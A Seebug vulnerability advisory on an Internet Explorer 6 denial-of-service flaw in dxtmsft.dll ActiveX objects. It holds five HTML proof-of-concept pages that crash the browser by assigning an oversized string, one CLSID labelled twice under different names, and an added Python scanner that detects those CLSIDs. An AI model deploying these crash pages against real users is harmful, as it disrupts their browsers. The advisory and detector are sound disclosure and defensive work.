Microsoft IE dxtmsft.dll Multiple ActiveX COM Object DoS

2006-12-08T00:00:00
ID SSV:753
Type seebug
Reporter Root
Modified 2006-12-08T00:00:00

Description

Microsoft Internet Explorer contains a flaw that may allow a remote denial of service. The issue is triggered when a user accesses a malicious web site that contains scripting code calling a number of ActiveX COM objects in the dxtmsft.dll library, and will result in loss of availability for the browser.

Internet Explorer 6: Upgrade to version 7 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable scripting or ActiveX controls.

// Tested on VMware, XP SP2, IE 6
//crash poc1,IDXTMask
<html>
<object classid='clsid:ADC6CB86-424C-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc2,DXTChroma
<html>
<object classid='clsid:421516C1-3CF8-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc3,DXTGlow
<html>
<object classid='clsid:9F8E6421-3D9B-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc4,IDXTDropShadow
<html>
<object classid='clsid:ADC6CB86-424C-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc5,DXTShadow
<html>
<object classid='clsid:E71B4063-3E59-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>
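
A defensive check for the trigger described above, as an added example that is not part of the original advisory: it scans HTML for object tags whose classid matches one of the CLSIDs used in the PoCs on this page, for use in content filtering or when triaging saved pages. The function names, the class name and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser

# CLSIDs exactly as they appear in the PoCs on this page (dxtmsft.dll objects).
DXTMSFT_CLSIDS = {
    "ADC6CB86-424C-11D2-952A-00C04FA34F05": "IDXTMask / IDXTDropShadow (both PoCs list this CLSID)",
    "421516C1-3CF8-11D2-952A-00C04FA34F05": "DXTChroma",
    "9F8E6421-3D9B-11D2-952A-00C04FA34F05": "DXTGlow",
    "E71B4063-3E59-11D2-952A-00C04FA34F05": "DXTShadow",
}

def normalize_classid(value):
    """Return the bare upper-case GUID from a classid attribute, or None."""
    v = (value or "").strip()
    if v[:6].lower() != "clsid:":
        return None
    return v[6:].strip().strip("{}").upper()

class ObjectTagScanner(HTMLParser):
    """Collects <object> tags that instantiate a listed dxtmsft.dll CLSID."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lower-cased; values are unescaped.
        if tag != "object":
            return
        attr = dict(attrs)
        guid = normalize_classid(attr.get("classid"))
        if guid in DXTMSFT_CLSIDS:
            line, _ = self.getpos()
            self.findings.append((line, guid, DXTMSFT_CLSIDS[guid], attr.get("id")))

def scan_html(text):
    """Return (line, clsid, name, element id) for every matching object tag."""
    scanner = ObjectTagScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

# Constructed sample input: mixed case, braces and padding, plus one unrelated object.
SAMPLE = """<html>
<OBJECT ClassID=" CLSID:{421516c1-3cf8-11d2-952a-00c04fa34f05} " id="fx"></OBJECT>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="other"></object>
<object classid='clsid:E71B4063-3E59-11D2-952A-00C04FA34F05' id='target' /></object>
</html>"""

if __name__ == "__main__":
    for line, guid, name, elem_id in scan_html(SAMPLE):
        print(f"line {line}: {name} {{{guid}}} id={elem_id!r}")
```

The scanner only covers static object tags; it does not evaluate script, so it complements rather than replaces the workaround of disabling scripting or ActiveX controls.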